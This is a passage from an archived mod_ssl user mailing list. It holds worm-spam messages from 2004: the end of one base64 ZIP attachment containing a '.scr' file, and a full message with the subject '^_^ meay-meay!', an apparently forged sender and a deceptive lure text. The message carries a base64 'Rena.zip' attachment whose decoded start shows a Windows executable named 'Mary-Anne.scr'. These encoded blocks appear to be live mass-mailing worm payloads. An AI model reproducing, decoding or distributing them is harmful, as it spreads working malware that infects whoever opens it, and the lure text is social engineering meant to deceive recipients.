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
AABDUwAAAAA=

----------towvjfwmwldoxgroniug--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 16:29:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 38BF5A8A81; Tue,  2 Mar 2004 16:29:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lutz (p5084FF35.dip.t-dialin.net [80.132.255.53])
	by master.modssl.org (Postfix) with SMTP id 723F3A8973
	for ; Tue,  2 Mar 2004 16:29:01 +0100 (CET)
Date: Tue, 02 Mar 2004 16:28:59 +0100
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ygshaitprdddkypsnnfv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ygshaitprdddkypsnnfv
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I enjoy clean conversations but am open to conversing with women and men with little ones as well. I am very open-minded. All authorization requests will be denied if I don't receive messages and get to know you first.

----------ygshaitprdddkypsnnfv
Content-Type: application/octet-stream; name="Rena.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Rena.zip"

UEsDBAoAAAAAAIB8YjAkYg8ST10AAE9dAAANAAAATWFyeS1Bbm5lLnNjck1akAADAAAABAAA
AP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgAAAAO
H7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0N
CiQAAAAAAAAAzqJ5+4rDF6iKwxeoisMXqIrDF6iJwxeoBNwEqLrDF6hi3BKoi8MXqHbjBaiL
wxeoTcURqIvDF6hSaWNoisMXqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUAAAAA
AAAAAAAAAAAA4AAPAQsBAAAADgAAAIAAAAAAAAAAsAAAABAAAAAgAAAAAEAAABAAAAACAAAE
AAAAAAAAAAQAAAAAAAAAAAABAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAA
AAAAAAAAAAAAMbIAANEAAAAAoAAAYA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAACsAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAIAAAAAA4AAAAAAAAEDQAAABAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAQAAAwAAGAAAAAAAAigQAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAMAAZgAAAAAA
APRoAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAABgDwAAAKAAAAAQAAAA
BAAAAAAAAAAAAAAAAAEAQAAAwAAAAAAAAAAAAFAAAACwAAAARAAAABQAAAAAAAAAAAAAAAAA
AEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAIAAwAAACAAAIAOAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAUAAAgAAAAAAAAAAAAAAA
AAAAAQABAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAQAA
AAAAkAAAAKCgAACoDgAAAAAAAAAAAABIrwAAFAAAAAAAAAAAAAAAKAAAADAAAABgAAAAAQAI
AAAAAACACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8AAAAAAJz//wCl//8Arf//ALX//wC9
//8Axv//AM7//wDW//8A3v//AOf//wDv//8A9///AIz7/wCU+/8Arfv/AHvv9wCM9/8Axvv/
AM77/wCE8/8AjPP/AJzv9wCl9/8Atff/ANb7/wBz5/cAhO//AJzz/wDe+/8ASs/nAGPb7wB7
6/8AjO//AIzn9wCt8/8AWs/nAGvf9wCE6/8AnO//AKXv/wC18/8Azvf/AOf7/wA5vt4AQsfn
AGvP5wCE5/8AlOv/AIzb7wDO7/cAKbbeADG63gAxnr0AUs/vAFrP7wBj1/cAa9PvAHvj/wB7
z+cAjOf/AK3n9wC17/8AxvP/AACezgAAlsYACJ7OAAiSvQAIirUAEKbWABiq1gAYjrUAIbLe
ACmy3gAprtYAIYalADm+5wAxgpwASrreAFK+3gBavt4Ac9//AHvf/wCEz+cApeP3AK3f7wC9
7/8Axuv3AN73/wAAms4AAJLGAAiOvQAQotYAEJ7OABB9pQAYqt4AGKbWACGm1gAYeZwAIaLO
ACmu3gAhiq0AMbbnADGy3gA5st4AQsPvACl5lABCtt4ASsPvAEq23gBaz/cAUrreADl9lABa
w+cAa9f/AGvT9wBjvt4Ac9v/AGvH5wBzz+8Ae8vnAITT7wCc3/cApef/AKXb7wDv+/8AIare
ACmq3gBCst4AUsf3AFK+5wBj0/8AWr7nAGPH7wBz1/8Aa8PnAHvT9wCE1/cAjNPvAJzX7wC9
5/cAxu//ANbz/wBjz/8Aa9P/AJzb9wC14/cASr73AGPL/wCU1/cArd/3AM7v/wDn9/8AveP3
AN7z/wDW7/8A7/f/APf7/wD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGxsbGxs
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW3F+YltGbGxsbAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW2N9kpaDaGFbXWRsbGwAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW2Z9kpKRkZGRkW5LQlxgbGxsAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW2Z9dHR0dHR0dHR0dIVuS0dbbGxsbAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAW4BAiIiIiIiIiIiIiIiIU1N0g2hhW2xsbGwAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAW4BYd3d3d3d3d3d3d3d3d3dTU1NUVHBOSkJsbGxsAAAAAAAAAAAAAAAA
AAAAAAAAW4CPU1NTU1NTU1NTU1NTU1NUVFRUVFRUVFQ6a0tebAAAAAAAAAAAAAAAAAAAAAAA
W4CPPDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDx1OWwAAAAAAAAAAAAAAAAAAAAAW4BBPjw8
PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8lWwAAAAAAAAAAAAAAAAAAAAAW4BWMjExMTExMTEx
MTExMTExMTExMTExMTExMTExlWwAAAAAAAAAAAAAAAAAAABbgICTMigoKCgoKCgoKCgoKCgo
KCgoKCgoKCgoKCgokVtsAAAAAAAAAAAAAAAAAABbgICTKR0dHR0dHR0dHR0dHR0dHR0dHR0d
HR0dHR0dkVtsAAAAAAAAAAAAAAAAAABbgIB8JSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
kUtsAAAAAAAAAAAAAAAAAABbgYF5KxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXkUtsAAAA
AAAAAAAAAAAAAABbaWl4GhMTExMTExMTExMTExMTExMTExMTExMTExMTkSZPAAAAAAAAAAAA
AAAAAABbhIR4GhAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQkTtNbAAAAAAAAAAAAAAAAABb
hIR4LBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQkSRJbAAAAAAAAAAAAAAAAABbhoZtFQMD
AwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDkRhFbAAAAAAAAAAAAAAAAABbc4dqGwMDAwMDAwMD
AwMDAwMDAwMDAwMDAwMDAwMDkQlbbAAAAAAAAAAAAAAAAABbe4pqGwQEBAQEBAQEBAQEBAQE
BAQEBAQEBAQEBAQEkQlEbAAAAAAAAAAAAAAAAABbl4pELQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFkQppbAAAAAAAAAAAAAAAAABbl4tEfwkHBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYG
kQtRcgAAAAAAAAAAAAAAAABbkypEUpl/fy0fGwkJCAcHBwcHBwcHBwcHBwcHBwcHkQswT2wA
AAAAAAAAAAAAAABbmConNVtEaol7lJp/fy0ICAgICAgICAgICAgICAgIkQwzZ2wAAAAAAAAA
AAAAAABbkB4XFxciJy81SFtEUFkNCgkJCQkJCQkJCQkJCQkJkQ0/SWwAAAAAAAAAAAAAAABb
kBkQEBAQEBAQEBAcOERZDQsLCwsLCwsLCwsLCwsLkQ2QQ2wAAAAAAAAAAAAAAABbWhEDAwMD
AwMDAwMDAy9Eng4ODQ0MDAwMDAwMDAwMkQ4OW2wAAAAAAAAAAAAAAABbmgUDAwMDAwMDAwMD
AwMuX2o9jI6cAQEODg4ODQ0NkQEBX2wAAAAAAAAAAAAAAABbmhQDAwMDAwMDAwMDAwQDEiEg
NkpbW0xqPY2OfwEBkAEBamwAAAAAAAAAAAAAAABbjS0DAwMDAwMDAwMDBS1/HxsIBwUDDxwh
IDZKW1uCRERERGwAAAAAAAAAAAAAAAAAW5oIAwMDAwMDAwMDLVlqb3p7lJ2fnx8KCAYFAxYc
WwAAAAAAAAAAAAAAAAAAAAAAW3oNAwMDAwMDAwMKmmVbAABbW1tbW2p4elebDg0LRAAAAAAA
AAAAAAAAAAAAAAAAAF+eAQEMDAkIBggBUFsAAAAAAAAAAFtbW1tbW1tbAAAAAAAAAAAAAAAA
AAAAAAAAAFtjgnZVjI40AQGMWwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAW1tbW1tbW1s3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAD///////8AAP///////wAA////////AAD///////8AAP///////wAA////////AAD/
B/////8AAP4Af////wAA/gAH////AAD+AAB///8AAP4AAAf//wAA/gAAAH//AAD+AAAAB/8A
AP4AAAAD/wAA/gAAAAH/AAD+AAAAAf8AAP4AAAAB/wAA/AAAAAD/AAD8AAAAAP8AAPwAAAAA
/wAA/AAAAAD/AAD8AAAAAP8AAPwAAAAAfwAA/AAAAAB/AAD8AAAAAH8AAPwAAAAAfwAA/AAA
AAB/AAD8AAAAAH8AAPwAAAAAfwAA/AAAAAA/AAD8AAAAAD8AAPwAAAAAPwAA/AAAAAA/AAD8
AAAAAD8AAPwAAAAAPwAA/AAAAAA/AAD8AAAAAD8AAP4AAAAD/wAA/gADAAP/AAD/AAf4B/8A
AP8AD////wAA/8Af////AAD///////8AAP///////wAA////////AAD///////8AAP//////
/wAA////////AAAAAAEAAQAwMAAAAQAYAKgOAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYOgBAAAA6IPEBOgBAAAA6V2B7dkh
QADoBAIAAOjrCOsCzSD/JCSaZr5SR+gBAAAAmlmNlSsiQADoAQAAAGlYZr9NSui/AQAAjVL5
6AEAAADoW2jM/+Ka/+Rp/6VHJEAA6ei5////6wLNIIvE6wLNIIEAFgAAAA+FpAEAAGnoAAAA
